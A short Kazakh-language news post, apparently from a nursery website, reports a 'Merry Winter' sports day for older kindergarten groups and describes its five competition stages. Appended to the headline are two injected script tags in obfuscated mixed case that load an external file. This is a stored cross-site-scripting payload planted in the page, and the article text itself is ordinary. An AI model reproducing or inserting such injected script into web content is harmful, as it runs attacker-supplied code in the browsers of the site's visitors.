"Көңілді қыс" денсаулық күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.01.2021

Уәлиханов көшесіндегі «Ақбота» бөбекжайында қаңтар айының 19 күні  ересек топтар арасында дене тәрбиесінің нұсқаушысы Шайдуллин Кайдардың ұйымдастыруымен  денсаулық күніне орай  «Көңілді қыс»  атты   спорттық іс-шара өткізілді.  Ауа райының суық болуына байланысты іс-шара бөбекжай ішінде өтті.   Іс-шара барысында балалар екі  топқа бөлініп, сайысқа түсті. Сайыс бес кезеңмен өтті.  1-кезең “ Хоккейшілер ”  ойыны деп аталды.  Бұл сайыста допты клюшкамен кедергілердің арасымен  домалатты.    2- кезеңде “ Шаңғышылар” жарысы деп аталды. Бұл кезеңде балалар шаңғы таяқшаларымен сырғанады.  3- кезең бойынша “ Кім епті? ” деп аталды.  Бұл сайыста қалақпен допты құлатпай, кедергілер арасымен жүгірді. 4- кезең “Жылдам жүгір” деп аталды. Бұл кезеңде балалар құрсауды көтеріп,  кедергілер арасымен жүгірді.  Сайыстың  соңғы  5-шы  кезеңінде  “Арқан тартыс” ойыны болды.  Бұл сайыста балалар арқан тартыс ойынын ойнап, өзара күш сынасты.  Іс-шара тартымды  және  өте  қызықты  өтті. Сайысты  қорытындылай  келе, балалар  естелік  ретінде  суретке  түсті. Қатысқан балалардың көңіл-күйлері ерекше керемет болды.

 

Просмотров: 301


Пікір қосу



Деректерді қолтаңбаға қосу